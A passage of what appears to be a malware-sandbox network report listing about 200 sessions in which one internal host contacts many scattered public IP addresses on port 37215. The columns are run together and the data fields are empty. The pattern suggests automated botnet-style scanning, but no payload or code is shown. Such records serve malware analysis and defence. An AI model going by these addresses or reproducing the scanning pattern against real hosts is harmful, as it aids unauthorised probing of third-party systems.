                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8942192.168.2.134911664.41.173.15337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8943192.168.2.134033241.235.176.7237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8944192.168.2.1349388157.92.237.8937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8945192.168.2.1343570137.142.116.19937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8946192.168.2.1360234165.182.96.13037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8947192.168.2.1337668197.195.145.10137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8948192.168.2.1359972153.162.140.20937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8949192.168.2.13348045.35.142.11737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8950192.168.2.1352750157.84.236.22537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8951192.168.2.135942464.175.64.5737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8952192.168.2.134544641.164.176.1637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8953192.168.2.134037241.97.236.937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8954192.168.2.1339784197.24.34.337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8955192.168.2.133508241.160.233.11437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8956192.168.2.1356712157.155.171.12437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8957192.168.2.1340752197.215.60.3537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8958192.168.2.1353550197.239.17.11937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8959192.168.2.1355312157.169.164.5037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8960192.168.2.1347094197.248.109.10437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8961192.168.2.1356584197.204.61.14537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8962192.168.2.1347048103.7.6.3837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8963192.168.2.1347616157.7.102.23537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8964192.168.2.1355668149.67.163.2937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8965192.168.2.136064241.40.227.15837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8966192.168.2.1349058157.8.167.3337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8967192.168.2.1349200197.85.66.3837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8968192.168.2.134767241.253.213.16937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8969192.168.2.134125651.216.170.18037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8970192.168.2.1335806210.237.51.14037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8971192.168.2.134298653.28.116.13537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8972192.168.2.135038841.220.246.6237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8973192.168.2.1360900157.58.158.1737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8974192.168.2.134446441.100.231.22137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8975192.168.2.135234041.233.225.23137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8976192.168.2.133481041.235.232.2237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8977192.168.2.135898441.49.171.20037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8978192.168.2.1359756197.112.218.11937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8979192.168.2.1355680136.104.182.17337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8980192.168.2.133648641.98.125.13537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8981192.168.2.1350770197.214.142.3337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8982192.168.2.134622841.100.117.14737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8983192.168.2.134750241.53.83.14337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8984192.168.2.133429441.173.220.25237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8985192.168.2.136087443.80.125.3137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8986192.168.2.1359674157.29.235.23237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8987192.168.2.1337320197.52.122.14037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8988192.168.2.1353744157.227.116.24037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8989192.168.2.1351914157.53.32.21437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8990192.168.2.135994241.103.125.4437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8991192.168.2.135386441.190.42.24837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8992192.168.2.1360728157.220.174.23237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8993192.168.2.1341942157.6.190.3637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8994192.168.2.1333420157.130.207.13537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8995192.168.2.1347806197.154.14.6737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8996192.168.2.1357556157.23.219.7137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8997192.168.2.1351818166.126.83.24437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8998192.168.2.1336732157.193.205.5437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8999192.168.2.135970241.161.141.15137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9000192.168.2.1359194157.88.184.23037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9001192.168.2.1337144157.17.172.20537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9002192.168.2.1360722197.58.221.16837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9003192.168.2.1356142197.124.87.14737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9004192.168.2.1333166157.70.249.14737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9005192.168.2.1344624157.211.240.6137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9006192.168.2.135713041.69.150.18737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9007192.168.2.1342030157.56.193.6037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9008192.168.2.1356972183.228.152.16837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9009192.168.2.1333838197.31.125.15337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9010192.168.2.133332641.16.32.2437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9011192.168.2.1348266157.44.228.22237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9012192.168.2.1354220157.173.221.24937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9013192.168.2.1343232157.63.122.14737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9014192.168.2.1345948157.11.5.1437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9015192.168.2.134937641.18.217.12537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9016192.168.2.1334220197.195.118.10337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9017192.168.2.135319041.187.99.5237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9018192.168.2.135169470.203.54.2237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9019192.168.2.1356366197.113.234.3637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9020192.168.2.1345404197.207.144.4437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9021192.168.2.1354282197.173.164.11937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9022192.168.2.1359610197.104.239.8637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9023192.168.2.1351374197.100.28.15437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9024192.168.2.1339858157.116.59.17737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9025192.168.2.1347500204.219.184.21137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9026192.168.2.1344738197.155.51.14837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9027192.168.2.133637441.199.110.21337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9028192.168.2.1334512157.183.151.20037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9029192.168.2.1343478201.130.202.3637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9030192.168.2.1357426114.167.101.7437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9031192.168.2.1350982157.202.76.4837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9032192.168.2.1360244157.158.30.22237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9033192.168.2.1335766157.176.213.22937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9034192.168.2.1337830157.108.74.2937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9035192.168.2.1352768157.51.174.22637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9036192.168.2.134118241.206.152.737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9037192.168.2.134773041.25.58.23937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9038192.168.2.134750813.239.107.1437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9039192.168.2.1353888157.222.153.19337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9040192.168.2.134802819.187.245.19837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9041192.168.2.1345830197.82.151.16637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9042192.168.2.1333696197.226.73.22537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9043192.168.2.1344620156.22.243.23137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9044192.168.2.1358572157.174.223.11837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9045192.168.2.1356280158.253.106.21137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9046192.168.2.133621641.50.192.20037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9047192.168.2.1354498197.18.204.15637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9048192.168.2.1353500197.38.76.11537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9049192.168.2.133392241.253.149.1137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9050192.168.2.1345186197.119.171.3037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9051192.168.2.134180441.191.90.25437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9052192.168.2.1357496157.39.158.13337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9053192.168.2.1340828157.144.44.13537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9054192.168.2.1350712157.96.76.19937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9055192.168.2.1346564197.201.164.17237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9056192.168.2.1344386144.238.204.10637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9057192.168.2.1350776210.10.218.437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9058192.168.2.1348644197.133.255.24337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9059192.168.2.1353112197.99.124.14537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9060192.168.2.1355430197.251.155.5337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9061192.168.2.1343250197.115.21.9737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9062192.168.2.1334160122.70.48.8637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9063192.168.2.1354492197.6.84.16237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9064192.168.2.133684271.222.129.11737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9065192.168.2.134668031.57.162.23337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9066192.168.2.1358488197.50.127.5037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9067192.168.2.1353840197.81.183.6437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9068192.168.2.1359412157.236.124.19037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9069192.168.2.1333568197.56.98.10937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9070192.168.2.135388242.151.151.2537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9071192.168.2.1340492157.139.117.11637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9072192.168.2.1345280157.35.117.23837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9073192.168.2.1341240197.65.50.6037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9074192.168.2.1343204157.57.50.22737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9075192.168.2.1359188157.111.222.5637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9076192.168.2.134007241.153.92.17137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9077192.168.2.1343492157.199.195.2937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9078192.168.2.1360856157.211.168.6137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9079192.168.2.1340314197.223.206.13937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9080192.168.2.1337194157.105.56.5537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9081192.168.2.1358926205.5.96.17537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9082192.168.2.1349562157.112.4.11237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9083192.168.2.134541024.36.95.3137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9084192.168.2.1359356197.63.231.10137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9085192.168.2.134546843.45.158.20237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9086192.168.2.133832257.99.229.15537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9087192.168.2.1354708157.33.165.21337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9088192.168.2.1351642197.241.170.22837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9089192.168.2.135040241.82.61.23837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9090192.168.2.134229641.119.18.13837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9091192.168.2.134585841.90.254.237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9092192.168.2.135844041.29.191.17637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9093192.168.2.1343514157.84.196.1537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9094192.168.2.1340684197.51.67.5037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9095192.168.2.134847641.115.170.22437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9096192.168.2.135446041.214.182.15037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9097192.168.2.134372841.106.207.2337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9098192.168.2.135543041.94.118.20437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9099192.168.2.1336638197.104.67.5737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9100192.168.2.1352688104.161.199.13337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9101192.168.2.133647841.24.245.3137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9102192.168.2.1336274157.254.214.23937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9103192.168.2.1351446197.180.188.22237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9104192.168.2.1345198134.60.212.18537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9105192.168.2.134731441.31.243.21537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9106192.168.2.1334692197.40.149.22737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9107192.168.2.1357736197.26.230.6937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9108192.168.2.135946041.14.172.15837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9109192.168.2.1352322157.155.87.9937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9110192.168.2.1333418157.116.64.10137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9111192.168.2.1339864197.183.214.19937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9112192.168.2.135988641.232.237.13837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9113192.168.2.1333248163.16.185.11937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9114192.168.2.1336686208.181.166.21737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9115192.168.2.134687286.59.133.5337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9116192.168.2.1345070175.14.43.9137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9117192.168.2.1352224166.4.3.22937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9118192.168.2.1358400157.206.51.18037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9119192.168.2.135110841.185.169.6837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9120192.168.2.135030241.129.194.837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9121192.168.2.133491441.142.73.24337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9122192.168.2.134515841.173.76.17437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9123192.168.2.1355510157.184.3.12537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9124192.168.2.1350352157.249.18.5237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9125192.168.2.135374669.225.162.2637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9126192.168.2.1338378157.151.66.12537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9127192.168.2.1343616157.167.63.12037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9128192.168.2.135413241.11.223.15037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9129192.168.2.1333194197.132.83.21837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9130192.168.2.1347180197.168.159.11437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9131192.168.2.1353388197.133.96.18437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9132192.168.2.1358618135.197.208.20137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9133192.168.2.1354056157.31.255.21237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9134192.168.2.135041841.5.184.15037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9135192.168.2.1360624183.35.49.10337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9136192.168.2.133528841.88.166.1737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9137192.168.2.1344488151.107.150.2637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9138192.168.2.134509041.77.4.2437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9139192.168.2.1352326197.146.130.1037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9140192.168.2.1346030157.74.36.2537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9141192.168.2.1348824197.194.15.21837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9142192.168.2.1353942146.43.186.6137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9143192.168.2.1346140157.186.128.21437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9144192.168.2.1340490157.116.17.2837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9145192.168.2.1340062157.6.82.13837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9146192.168.2.1340374197.181.15.337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9147192.168.2.1341974197.139.231.11637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9148192.168.2.1358134197.202.75.8837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9149192.168.2.133316641.194.35.20537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9150192.168.2.1356842197.34.168.21737215
                                                  TimestampBytes transferredDirectionData


